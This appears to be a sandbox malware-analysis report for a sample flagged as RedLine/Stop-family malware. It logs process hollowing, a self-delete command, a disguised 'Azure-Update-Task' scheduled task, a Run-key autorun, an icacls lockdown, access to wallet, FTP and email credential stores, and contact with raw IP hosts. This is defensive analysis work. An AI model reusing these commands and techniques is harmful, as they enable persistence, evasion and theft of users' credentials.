RegOpenKeyExA March 12, 2023, 11:03 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{9B84A461-3B4C-40E2-B44F-CE22E215EE40} base_handle: 0x80000002 key_handle: 0x0000059c options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{9B84A461-3B4C-40E2-B44F-CE22E215EE40}	1
RegOpenKeyExA March 12, 2023, 11:03 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{AC76BA86-7AD7-FFFF-7B44-AC0F074E4100} base_handle: 0x80000002 key_handle: 0x0000059c options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{AC76BA86-7AD7-FFFF-7B44-AC0F074E4100}	1
RegOpenKeyExA March 12, 2023, 11:03 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{BB8B979E-E336-47E7-96BC-1031C1B94561} base_handle: 0x80000002 key_handle: 0x0000059c options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{BB8B979E-E336-47E7-96BC-1031C1B94561}	1

Uses Windows utilities for basic Windows functionality (3 events)

cmdline	"C:\Windows\System32\cmd.exe" /c timeout /t 6 & del /f /q "C:\Users\test22\AppData\Local\da7eb17b-ad07-4b46-8386-a2dc6d315c48\build2.exe" & exit
cmdline	C:\Windows\System32\cmd.exe /c timeout /t 6 & del /f /q "C:\Users\test22\AppData\Local\da7eb17b-ad07-4b46-8386-a2dc6d315c48\build2.exe" & exit
cmdline	/C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\test22\AppData\Roaming\Microsoft\Network\mstsca.exe"

Communicates with host for which no DNS query was performed (1 event)

host

116.202.6.47

Allocates execute permission to another process indicative of possible code injection (3 events)

Time & API	Arguments	Status
NtAllocateVirtualMemory March 12, 2023, 11:03 a.m.	process_identifier: 2108 region_size: 1273856 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x0000009c	1
NtAllocateVirtualMemory March 12, 2023, 11:03 a.m.	process_identifier: 2392 region_size: 1273856 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x0000009c	1
NtAllocateVirtualMemory March 12, 2023, 11:03 a.m.	process_identifier: 2668 region_size: 462848 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000080	1

Checks the CPU name from registry, possibly for anti-virtualization (1 event)

registry

HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString

Installs itself for autorun at Windows startup (1 event)

reg_key

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\SysHelper

reg_value

"C:\Users\test22\AppData\Local\75fe9bcd-3a70-4b99-b8ee-8282ac6a5e90\build.exe" --AutoStart

Attempts to access Bitcoin/ALTCoin wallets (1 event)

file	C:\Users\test22\AppData\Roaming\Electrum\wallets\

Harvests credentials from local FTP client softwares (2 events)

file	C:\Users\test22\AppData\Roaming\FileZilla\recentservers.xml
registry	HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Configuration

Potential code injection by writing to the memory of another process (3 events)

Time & API	Arguments	Status	Return
WriteProcessMemory March 12, 2023, 11:03 a.m.	buffer: @ base_address: 0x7efde008 process_identifier: 2108 process_handle: 0x0000009c	1	1
WriteProcessMemory March 12, 2023, 11:03 a.m.	buffer: @ base_address: 0x7efde008 process_identifier: 2392 process_handle: 0x0000009c	1	1
WriteProcessMemory March 12, 2023, 11:03 a.m.	buffer: @ base_address: 0x7efde008 process_identifier: 2668 process_handle: 0x00000080	1	1

Collects information about installed applications (38 events)

Time & API	Arguments	Status
RegQueryValueExA March 12, 2023, 11:03 a.m.	key_handle: 0x0000059c regkey_r: DisplayName reg_type: 1 (REG_SZ) value: 7-Zip 20.02 alpha regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\7-Zip\DisplayName	1
RegQueryValueExA March 12, 2023, 11:03 a.m.	key_handle: 0x0000059c regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Adobe AIR regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Adobe AIR\DisplayName	1
RegQueryValueExA March 12, 2023, 11:03 a.m.	key_handle: 0x0000059c regkey_r: DisplayName reg_type: 1 (REG_SZ) value: EditPlus regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\EditPlus\DisplayName	1
RegQueryValueExA March 12, 2023, 11:03 a.m.	key_handle: 0x0000059c regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Chrome regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome\DisplayName	1
RegQueryValueExA March 12, 2023, 11:03 a.m.	key_handle: 0x0000059c regkey_r: DisplayName reg_type: 1 (REG_SZ) value: ????? ?? 2010 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Haansoft HWord 80 Korean\DisplayName	1
RegQueryValueExA March 12, 2023, 11:03 a.m.	key_handle: 0x0000059c regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Mozilla Thunderbird 78.4.0 (x86 ko) regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Mozilla Thunderbird 78.4.0 (x86 ko)\DisplayName	1
RegQueryValueExA March 12, 2023, 11:03 a.m.	key_handle: 0x0000059c regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Professional Plus 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Office15.PROPLUSR\DisplayName	1
RegQueryValueExA March 12, 2023, 11:03 a.m.	key_handle: 0x0000059c regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Adobe AIR regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{00203668-8170-44A0-BE44-B632FA4D780F}\DisplayName	1
RegQueryValueExA March 12, 2023, 11:03 a.m.	key_handle: 0x0000059c regkey_r: DisplayName reg_type: 1 (REG_SZ) value: HttpWatch Professional 9.3.39 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{01B845D4-B73E-4CF7-A377-94BC7BB4F77B}\DisplayName	1
RegQueryValueExA March 12, 2023, 11:03 a.m.	key_handle: 0x0000059c regkey_r: DisplayName reg_type: 1 (REG_SZ) value: ????? ?? 2010 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{1D91F7DA-F517-4727-9E62-B7EA978BE980}\DisplayName	1
RegQueryValueExA March 12, 2023, 11:03 a.m.	key_handle: 0x0000059c regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Java 8 Update 131 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{26A24AE4-039D-4CA4-87B4-2F32180131F0}\DisplayName	1
RegQueryValueExA March 12, 2023, 11:03 a.m.	key_handle: 0x0000059c regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Java Auto Updater regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{4A03706F-666A-4037-7777-5F2748764D10}\DisplayName	1
RegQueryValueExA March 12, 2023, 11:03 a.m.	key_handle: 0x0000059c regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Google Update Helper regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}\DisplayName	1
RegQueryValueExA March 12, 2023, 11:03 a.m.	key_handle: 0x0000059c regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Access MUI (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0015-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExA March 12, 2023, 11:03 a.m.	key_handle: 0x0000059c regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Excel MUI (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0016-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExA March 12, 2023, 11:03 a.m.	key_handle: 0x0000059c regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft PowerPoint MUI (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0018-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExA March 12, 2023, 11:03 a.m.	key_handle: 0x0000059c regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Publisher MUI (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0019-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExA March 12, 2023, 11:03 a.m.	key_handle: 0x0000059c regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Outlook MUI (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-001A-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExA March 12, 2023, 11:03 a.m.	key_handle: 0x0000059c regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Word MUI (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-001B-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExA March 12, 2023, 11:03 a.m.	key_handle: 0x0000059c regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Proofing Tools 2013 - English regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-001F-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExA March 12, 2023, 11:03 a.m.	key_handle: 0x0000059c regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Outils de vérification linguistique 2013 de Microsoft Office - Français regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-001F-040C-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExA March 12, 2023, 11:03 a.m.	key_handle: 0x0000059c regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Proofing Tools 2013 - Español regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-001F-0C0A-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExA March 12, 2023, 11:03 a.m.	key_handle: 0x0000059c regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Proofing (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-002C-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExA March 12, 2023, 11:03 a.m.	key_handle: 0x0000059c regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft InfoPath MUI (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0044-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExA March 12, 2023, 11:03 a.m.	key_handle: 0x0000059c regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Shared MUI (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-006E-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExA March 12, 2023, 11:03 a.m.	key_handle: 0x0000059c regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft DCF MUI (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0090-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExA March 12, 2023, 11:03 a.m.	key_handle: 0x0000059c regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft OneNote MUI (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-00A1-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExA March 12, 2023, 11:03 a.m.	key_handle: 0x0000059c regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Groove MUI (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-00BA-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExA March 12, 2023, 11:03 a.m.	key_handle: 0x0000059c regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office OSM MUI (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-00E1-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExA March 12, 2023, 11:03 a.m.	key_handle: 0x0000059c regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office OSM UX MUI (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-00E2-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExA March 12, 2023, 11:03 a.m.	key_handle: 0x0000059c regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Shared Setup Metadata MUI (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0115-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExA March 12, 2023, 11:03 a.m.	key_handle: 0x0000059c regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Access Setup Metadata MUI (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0117-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExA March 12, 2023, 11:03 a.m.	key_handle: 0x0000059c regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Lync MUI (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-012B-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExA March 12, 2023, 11:03 a.m.	key_handle: 0x0000059c regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Professional Plus 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{91150000-0011-0000-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExA March 12, 2023, 11:03 a.m.	key_handle: 0x0000059c regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Adobe Flash Player 13 ActiveX regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{939659F3-71D2-461F-B24D-91D05A4389B4}\DisplayName	1
RegQueryValueExA March 12, 2023, 11:03 a.m.	key_handle: 0x0000059c regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Adobe Flash Player 13 NPAPI regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{9B84A461-3B4C-40E2-B44F-CE22E215EE40}\DisplayName	1
RegQueryValueExA March 12, 2023, 11:03 a.m.	key_handle: 0x0000059c regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Adobe Acrobat Reader DC MUI regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{AC76BA86-7AD7-FFFF-7B44-AC0F074E4100}\DisplayName	1
RegQueryValueExA March 12, 2023, 11:03 a.m.	key_handle: 0x0000059c regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Visual C++ 2015 Redistributable (x64) - 14.0.24215 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{d992c12e-cab2-426f-bde3-fb8c53950b0d}\DisplayName	1

Harvests credentials from local email clients (4 events)

file	C:\Users\test22\AppData\Roaming\Thunderbird\profiles.ini
registry	HKEY_CURRENT_USER\Software\Microsoft\Windows Messaging Subsystem\Profiles\9375CFF0413111d3B88A00104B2A6676\00000004
registry	HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003
registry	HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001

Attempts to create or modify system certificates (1 event)

registry

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F81F111D0E5AB58D396F7BF525577FD30FDC95AA\Blob

Network activity contains more than one unique useragent (3 events)

process	build.exe	useragent	Microsoft Internet Explorer
process	build2.exe	useragent	Mozilla/5.0 (Windows NT 10.0; x64 rv:107.0) Gecko / 20100101 Firefox / 107.0
process	build2.exe	useragent	Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.1.2 Safari/605.1.15

Used NtSetContextThread to modify a thread in a remote process indicative of process injection (6 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 1460 called NtSetContextThread to modify thread in remote process 2108
Process injection	Process 2312 called NtSetContextThread to modify thread in remote process 2392
Process injection	Process 2600 called NtSetContextThread to modify thread in remote process 2668
NtSetContextThread March 12, 2023, 11:03 a.m.	registers.eip: 2005598660 registers.esp: 1638384 registers.edi: 0 registers.eax: 4342081 registers.ebp: 0 registers.edx: 0 registers.ebx: 2130567168 registers.esi: 0 registers.ecx: 0 thread_handle: 0x00000098 process_identifier: 2108	1	0	0
NtSetContextThread March 12, 2023, 11:03 a.m.	registers.eip: 2005598660 registers.esp: 1638384 registers.edi: 0 registers.eax: 4342081 registers.ebp: 0 registers.edx: 0 registers.ebx: 2130567168 registers.esi: 0 registers.ecx: 0 thread_handle: 0x00000098 process_identifier: 2392	1	0	0
NtSetContextThread March 12, 2023, 11:03 a.m.	registers.eip: 2005598660 registers.esp: 1638384 registers.edi: 0 registers.eax: 4390060 registers.ebp: 0 registers.edx: 0 registers.ebx: 2130567168 registers.esi: 0 registers.ecx: 0 thread_handle: 0x0000007c process_identifier: 2668	1	0	0

Found URLs in memory pointing to an IP address rather than a domain (potentially indicative of Command & Control traffic) (1 event)

url	http://65.109.12.165:80

Resumed a suspended thread in a remote process potentially indicative of process injection (10 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 1460 resumed a thread in remote process 2108
Process injection	Process 2108 resumed a thread in remote process 2312
Process injection	Process 2312 resumed a thread in remote process 2392
Process injection	Process 2600 resumed a thread in remote process 2668
Process injection	Process 2668 resumed a thread in remote process 2340
NtResumeThread March 12, 2023, 11:03 a.m.	thread_handle: 0x00000098 suspend_count: 1 process_identifier: 2108	1	0	0
NtResumeThread March 12, 2023, 11:03 a.m.	thread_handle: 0x000002c0 suspend_count: 1 process_identifier: 2312	1	0	0
NtResumeThread March 12, 2023, 11:03 a.m.	thread_handle: 0x00000098 suspend_count: 1 process_identifier: 2392	1	0	0
NtResumeThread March 12, 2023, 11:03 a.m.	thread_handle: 0x0000007c suspend_count: 1 process_identifier: 2668	1	0	0
NtResumeThread March 12, 2023, 11:04 a.m.	thread_handle: 0x00000608 suspend_count: 1 process_identifier: 2340	1	0	0

Uses suspicious command line tools or Windows utilities (1 event)

cmdline

icacls "C:\Users\test22\AppData\Local\75fe9bcd-3a70-4b99-b8ee-8282ac6a5e90" /deny *S-1-1-0:(OI)(CI)(DE,DC)

File has been identified by 27 AntiVirus engines on VirusTotal as malicious (27 events)

Elastic	malicious (high confidence)
MicroWorld-eScan	Gen:Variant.Zusy.452675
FireEye	Generic.mg.918b9b4d24503556
CAT-QuickHeal	Ransom.Stop.P5
Malwarebytes	MachineLearning/Anomalous.94%
Sangfor	Trojan.Win32.Save.a
CrowdStrike	win/malicious_confidence_100% (W)
Arcabit	Trojan.Zusy.D6E843
Symantec	ML.Attribute.HighConfidence
APEX	Malicious
Avast	FileRepMalware [Ransom]
Cynet	Malicious (score: 100)
Kaspersky	HEUR:Backdoor.Win32.Mokes.gen
BitDefender	Gen:Variant.Zusy.452675
Emsisoft	Gen:Variant.Zusy.452675 (B)
Trapmine	malicious.high.ml.score
Sophos	Troj/Krypt-VE
MAX	malware (ai score=89)
Microsoft	Trojan:Win32/RedLine.LD!MTB
ZoneAlarm	HEUR:Backdoor.Win32.Mokes.gen
GData	Gen:Variant.Zusy.452675
Google	Detected
Acronis	suspicious
Rising	Trojan.Kryptik!1.E370 (CLASSIC)
SentinelOne	Static AI - Suspicious PE
MaxSecure	Trojan.Malware.300983.susgen
AVG	FileRepMalware [Ransom]

Executed a process and injected code into it, probably while unpacking (30 events)

Time & API	Arguments	Status	Return
CreateProcessInternalW March 12, 2023, 11:03 a.m.	thread_identifier: 2112 thread_handle: 0x00000098 process_identifier: 2108 current_directory: filepath: C:\Users\test22\AppData\Local\Temp\build.exe track: 1 command_line: "C:\Users\test22\AppData\Local\Temp\build.exe" filepath_r: C:\Users\test22\AppData\Local\Temp\build.exe stack_pivoted: 0 creation_flags: 134217732 (CREATE_NO_WINDOW\|CREATE_SUSPENDED) inherit_handles: 0 process_handle: 0x0000009c	1	1
NtGetContextThread March 12, 2023, 11:03 a.m.	thread_handle: 0x00000098	1	0
NtUnmapViewOfSection March 12, 2023, 11:03 a.m.	base_address: 0x00400000 region_size: 4096 process_identifier: 2108 process_handle: 0x0000009c	1	0
NtAllocateVirtualMemory March 12, 2023, 11:03 a.m.	process_identifier: 2108 region_size: 1273856 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x0000009c	1	0
WriteProcessMemory March 12, 2023, 11:03 a.m.	buffer: @ base_address: 0x7efde008 process_identifier: 2108 process_handle: 0x0000009c	1	1
NtSetContextThread March 12, 2023, 11:03 a.m.	registers.eip: 2005598660 registers.esp: 1638384 registers.edi: 0 registers.eax: 4342081 registers.ebp: 0 registers.edx: 0 registers.ebx: 2130567168 registers.esi: 0 registers.ecx: 0 thread_handle: 0x00000098 process_identifier: 2108	1	0
NtResumeThread March 12, 2023, 11:03 a.m.	thread_handle: 0x00000098 suspend_count: 1 process_identifier: 2108	1	0
CreateProcessInternalW March 12, 2023, 11:03 a.m.	thread_identifier: 2256 thread_handle: 0x00000310 process_identifier: 2252 current_directory: filepath: track: 1 command_line: icacls "C:\Users\test22\AppData\Local\75fe9bcd-3a70-4b99-b8ee-8282ac6a5e90" /deny *S-1-1-0:(OI)(CI)(DE,DC) filepath_r: stack_pivoted: 0 creation_flags: 72 (DETACHED_PROCESS\|IDLE_PRIORITY_CLASS) inherit_handles: 0 process_handle: 0x00000300	1	1
CreateProcessInternalW March 12, 2023, 11:03 a.m.	thread_identifier: 2316 thread_handle: 0x000002c0 process_identifier: 2312 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Users\test22\AppData\Local\Temp\build.exe track: 1 command_line: "C:\Users\test22\AppData\Local\Temp\build.exe" --Admin IsNotAutoStart IsNotTask filepath_r: C:\Users\test22\AppData\Local\Temp\build.exe stack_pivoted: 0 creation_flags: 67634196 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_SUSPENDED\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x000002c8	1	1
NtResumeThread March 12, 2023, 11:03 a.m.	thread_handle: 0x000002c0 suspend_count: 1 process_identifier: 2312	1	0
CreateProcessInternalW March 12, 2023, 11:03 a.m.	thread_identifier: 2396 thread_handle: 0x00000098 process_identifier: 2392 current_directory: filepath: C:\Users\test22\AppData\Local\Temp\build.exe track: 1 command_line: "C:\Users\test22\AppData\Local\Temp\build.exe" --Admin IsNotAutoStart IsNotTask filepath_r: C:\Users\test22\AppData\Local\Temp\build.exe stack_pivoted: 0 creation_flags: 134217732 (CREATE_NO_WINDOW\|CREATE_SUSPENDED) inherit_handles: 0 process_handle: 0x0000009c	1	1
NtGetContextThread March 12, 2023, 11:03 a.m.	thread_handle: 0x00000098	1	0
NtUnmapViewOfSection March 12, 2023, 11:03 a.m.	base_address: 0x00400000 region_size: 4096 process_identifier: 2392 process_handle: 0x0000009c	1	0
NtAllocateVirtualMemory March 12, 2023, 11:03 a.m.	process_identifier: 2392 region_size: 1273856 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x0000009c	1	0
WriteProcessMemory March 12, 2023, 11:03 a.m.	buffer: @ base_address: 0x7efde008 process_identifier: 2392 process_handle: 0x0000009c	1	1
NtSetContextThread March 12, 2023, 11:03 a.m.	registers.eip: 2005598660 registers.esp: 1638384 registers.edi: 0 registers.eax: 4342081 registers.ebp: 0 registers.edx: 0 registers.ebx: 2130567168 registers.esi: 0 registers.ecx: 0 thread_handle: 0x00000098 process_identifier: 2392	1	0
NtResumeThread March 12, 2023, 11:03 a.m.	thread_handle: 0x00000098 suspend_count: 1 process_identifier: 2392	1	0
CreateProcessInternalW March 12, 2023, 11:03 a.m.	thread_identifier: 2604 thread_handle: 0x000002c0 process_identifier: 2600 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Users\test22\AppData\Local\da7eb17b-ad07-4b46-8386-a2dc6d315c48\build2.exe track: 1 command_line: "C:\Users\test22\AppData\Local\da7eb17b-ad07-4b46-8386-a2dc6d315c48\build2.exe" filepath_r: C:\Users\test22\AppData\Local\da7eb17b-ad07-4b46-8386-a2dc6d315c48\build2.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x000002b8	1	1
CreateProcessInternalW March 12, 2023, 11:03 a.m.	thread_identifier: 2852 thread_handle: 0x000004bc process_identifier: 2848 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Users\test22\AppData\Local\da7eb17b-ad07-4b46-8386-a2dc6d315c48\build3.exe track: 1 command_line: "C:\Users\test22\AppData\Local\da7eb17b-ad07-4b46-8386-a2dc6d315c48\build3.exe" filepath_r: C:\Users\test22\AppData\Local\da7eb17b-ad07-4b46-8386-a2dc6d315c48\build3.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x000004d0	1	1
CreateProcessInternalW March 12, 2023, 11:03 a.m.	thread_identifier: 2672 thread_handle: 0x0000007c process_identifier: 2668 current_directory: filepath: C:\Users\test22\AppData\Local\da7eb17b-ad07-4b46-8386-a2dc6d315c48\build2.exe track: 1 command_line: "C:\Users\test22\AppData\Local\da7eb17b-ad07-4b46-8386-a2dc6d315c48\build2.exe" filepath_r: C:\Users\test22\AppData\Local\da7eb17b-ad07-4b46-8386-a2dc6d315c48\build2.exe stack_pivoted: 0 creation_flags: 134217732 (CREATE_NO_WINDOW\|CREATE_SUSPENDED) inherit_handles: 0 process_handle: 0x00000080	1	1
NtGetContextThread March 12, 2023, 11:03 a.m.	thread_handle: 0x0000007c	1	0
NtUnmapViewOfSection March 12, 2023, 11:03 a.m.	base_address: 0x00400000 region_size: 4096 process_identifier: 2668 process_handle: 0x00000080	1	0
